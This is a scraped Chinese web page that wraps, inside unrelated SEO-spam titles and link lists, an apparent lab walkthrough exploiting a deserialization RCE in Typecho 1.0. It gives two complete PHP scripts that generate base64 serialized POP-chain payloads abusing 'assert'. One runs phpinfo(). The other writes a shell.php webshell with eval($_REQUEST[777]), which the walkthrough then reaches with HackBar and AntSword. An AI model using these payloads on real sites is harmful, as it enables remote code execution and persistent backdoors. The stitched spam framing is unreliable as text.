当前位置: 首页 > news >正文

郑州市公共资源交易中心成都seo优化推广

郑州市公共资源交易中心,成都seo优化推广,网站建设、微信小程序、,企业怎么做好网站优化文章目录 执行phpinfogetshell 执行phpinfo 将下面这段代码复制到一个php文件&#xff0c;命名为typecho_1.0-14.10.10_unserialize_phpinfo.php&#xff0c;代码中定义的类名与typecho中的类相同&#xff0c;是它能识别的类&#xff1a; <?php class Typecho_Feed{const…

文章目录

  • 执行phpinfo
  • getshell

执行phpinfo

将下面这段代码复制到一个php文件,命名为typecho_1.0-14.10.10_unserialize_phpinfo.php,代码中定义的类名与typecho中的类相同,是它能识别的类:

<?php
class Typecho_Feed{const RSS1 = 'RSS 1.0';const RSS2 = 'RSS 2.0';const ATOM1 = 'ATOM 1.0';const DATE_RFC822 = 'r';const DATE_W3CDTF = 'c';const EOL = "\n";private $_type;private $_items;public function __construct(){$this->_type = $this::RSS2;$this->_items[0] = array('title' => '1','link' => '1','date' => 1508895132,'category' => array(new Typecho_Request()),'author' => new Typecho_Request(),);}
}class Typecho_Request{private $_params = array();private $_filter = array();public function __construct(){$this->_params['screenName'] = 'phpinfo()';$this->_filter[0] = 'assert';}
}$exp = array('adapter' => new Typecho_Feed(),'prefix' => 'typecho_'
);echo base64_encode(serialize($exp));
?>

将文件放到虚拟机C:\phpstudy_2016\WWW\unserialize的目录下,打开后可以获得它的base64编码:

在这里插入图片描述

在typecho主页用hackbar进行代码注入,注入成功就说明此处存在RCE漏洞:

在这里插入图片描述

注入成功(说明此处存在RCE漏洞,也可以尝试getshell),回显出phpinfo界面:

在这里插入图片描述

getshell

同上,将这段利用代码复制到php文件中:

<?php
class Typecho_Feed{const RSS1 = 'RSS 1.0';const RSS2 = 'RSS 2.0';const ATOM1 = 'ATOM 1.0';const DATE_RFC822 = 'r';const DATE_W3CDTF = 'c';const EOL = "\n";private $_type;private $_items;public function __construct(){$this->_type = $this::RSS2;$this->_items[0] = array('title' => '1','link' => '1','date' => 1508895132,'category' => array(new Typecho_Request()),'author' => new Typecho_Request(),);}
}class Typecho_Request{private $_params = array();private $_filter = array();public function __construct(){$this->_params['screenName'] = "fputs(fopen('shell.php', w), '<?php phpinfo();@eval(\$_REQUEST[777])?>')";$this->_filter[0] = 'assert';}
}$exp = array('adapter' => new Typecho_Feed(),'prefix' => 'typecho_'
);echo base64_encode(serialize($exp));
?>

打开:
在这里插入图片描述

在hackbar中执行:

在这里插入图片描述

页面回显正常:

在这里插入图片描述

在typecho根目录下已经成功写入一个shell.php文件,里面包含一句话木马,并可以正常访问:

在这里插入图片描述

蚁剑测试连接成功:

在这里插入图片描述

成功获取webshell:

在这里插入图片描述

http://www.ds6.com.cn/news/108834.html

相关文章:

  • 商城网站 搭建免费网站制作教程
  • 做网站 用什么兼容网络seo啥意思
  • 在哪个网站可以做图文合并关键词推广方式
  • 南部 网站 建设市场营销策划案的范文
  • wordpress斌果主题抖音seo怎么做
  • 做网站只开发手机端可不可以品牌策划推广方案
  • 青岛做企业网站的公司网站优化一年多少钱
  • 编写 网站 语言百度网站关键词排名查询
  • 可商用的图片素材网站如何在百度发布广告信息
  • 镇江 网站建设郑州seo询搜点网络效果佳
  • 延吉最好的网站建设公司东莞头条最新新闻
  • 加强网站建设的制度网页设计模板免费网站
  • 小企业网站 优帮云杭州排名优化公司电话
  • 网站制作定制图长沙网络营销顾问
  • 室内设计师怎么找seo引擎优化培训
  • 房山区网站建设华与华营销策划公司
  • 网络运营推广怎么做网站seo整站优化
  • 官方网站建设的意义自己怎么优化我网站关键词
  • 还有其他做问卷的网站吗seo网站外包公司
  • 天津品牌网站建设公司站长之家排行榜
  • 现在还用dw做网站设计么seo1短视频网页入口营销
  • 找人做网站域名怎么过户大数据营销软件
  • 网站合作推广方案云和数据培训机构怎么样
  • 济宁房产网站建设站长工具友链检测
  • 山东省住房和城乡建设厅电话号码成都seo
  • 梁山网站建设企业培训课程价格
  • 利用网站空间做代理2022年列入传销组织最新骗法
  • 建网站的英文企业宣传片制作
  • 聊城做网站的公司案例重大军事新闻
  • 做网站从哪里找货源推广资源网